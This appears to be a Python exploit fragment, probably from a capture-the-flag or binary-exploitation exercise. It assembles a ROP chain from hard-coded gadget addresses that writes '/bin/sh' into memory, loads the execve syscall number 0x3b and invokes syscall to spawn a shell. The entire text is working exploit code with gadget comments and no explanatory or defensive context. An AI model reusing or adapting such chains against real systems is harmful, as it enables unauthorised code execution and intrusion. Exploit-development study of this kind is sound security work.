payload = p64(0x40125d)
#0x000000000040125d: pop rbp; ret; 
payload += p64(0x4c2148)+p64(0x4017cc)
# 0x00000000004017cc: pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x68662f6e69622f)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x47b247)
# 0x000000000047b247: pop rsi; ret; 
payload += p64(0x4017d3)+p64(0x4206ec)
# 0x00000000004206ec: mov qword ptr [rbp - 0xd8], r12; jmp rsi; 
payload += b''
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x4c2070)+p64(0x47b247)
# 0x000000000047b247: pop rsi; ret; 
payload += p64(0x0)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x0)+p64(0x417417)
# 0x0000000000417417: xchg eax, ebp; ret; 
payload += p64(0x419749)
# 0x0000000000419749: xchg eax, edx; ret; 
payload += p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x3b)+p64(0x417417)
# 0x0000000000417417: xchg eax, ebp; ret; 
payload += p64(0x41b906)
# 0x000000000041b906: syscall; 
payload += b''
